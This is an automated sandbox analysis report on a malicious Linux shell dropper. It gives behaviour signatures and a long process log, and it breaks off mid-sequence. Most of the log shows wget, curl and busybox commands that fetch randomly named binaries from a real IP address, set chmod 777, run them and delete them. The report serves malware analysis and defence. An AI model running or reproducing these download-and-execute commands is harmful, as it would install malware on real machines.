Analysis Overview
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
Threat Level: Shows suspicious behavior
The file 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:27
Reported
2024-10-25 01:30
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
11s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
Processes
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/chmod
[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/rm
[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/wget
[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/chmod
[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/rm
[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/wget
[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/chmod
[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/rm
[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/wget
[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/chmod
[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/rm
[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/wget
[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/chmod
[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/rm
[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/wget
[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/chmod
[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/rm
[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/wget
[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/chmod
[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/rm
[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/wget
[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/chmod
[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/rm
[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/wget
[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/chmod
[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/rm
[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/wget
[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/chmod
[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/rm
[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/wget
[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/chmod
[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/rm
[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/wget
[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/chmod
[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/rm
[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/wget
[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/chmod
[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/rm
[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/chmod
[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/rm
[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/chmod
[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/rm
[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/wget
[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/chmod
[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/rm
[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/wget
[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/chmod
[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/rm
[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/wget
[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/chmod
[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/rm
[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/wget
[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/chmod
[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/rm
[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/wget
[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/chmod
[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/rm
[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/wget
[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/chmod
[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/rm
[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/wget
[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/chmod
[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/rm
[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/wget
[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/chmod
[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/rm
[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/wget
[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/chmod
[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/rm
[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/wget
[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/chmod
[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/rm
[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/wget
[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/busybox
